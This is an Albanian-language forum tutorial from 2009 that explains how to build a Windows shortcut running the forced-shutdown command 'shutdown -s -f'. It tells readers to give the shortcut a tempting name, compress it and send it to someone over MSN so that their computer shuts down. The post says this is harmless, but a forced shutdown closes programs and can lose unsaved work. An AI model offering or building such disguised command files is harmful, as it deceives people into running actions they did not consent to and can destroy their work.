ForumPortalCalendarPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimi

Share | 
 

 Fikja PC me Fore

Shko poshtë 
AutoriMesazh
Denn1s
S.Moderator
S.Moderator
Denn1s

Numri i postimeve : 91
Age : 25
Nga Jeni : Peja
Registration date : 23/01/2009

MesazhTitulli: Fikja PC me Fore   Fri Feb 06, 2009 8:48 pm

fike pc me fore
By: Denn1s
--------------------------------------------------------------
sGh-Team.Tk
me shym pc me fore per 30 sec...

1.kliko dikund ne hapsir te tastin e djatht te mausit
2.new
3.shortcut
4.shutdown -s -f
5.ok
6. ja leni nji emer per ma hanger dikush foren
7. nese don e kompreseon me ja que dikujt per mes msn
8.dhe per 30 sekond pc-se i behete shutdown........
(mos e provo ne pc tande sepse mun me ta shkym ty


ska pasoja vetem se e shkym pc duhet prap ristart
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit
 
Fikja PC me Fore
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
 :: ¸.·´¯) Paneli i Kontrollit (¯`·., :: Tutorials & Mesime-
Kërce tek: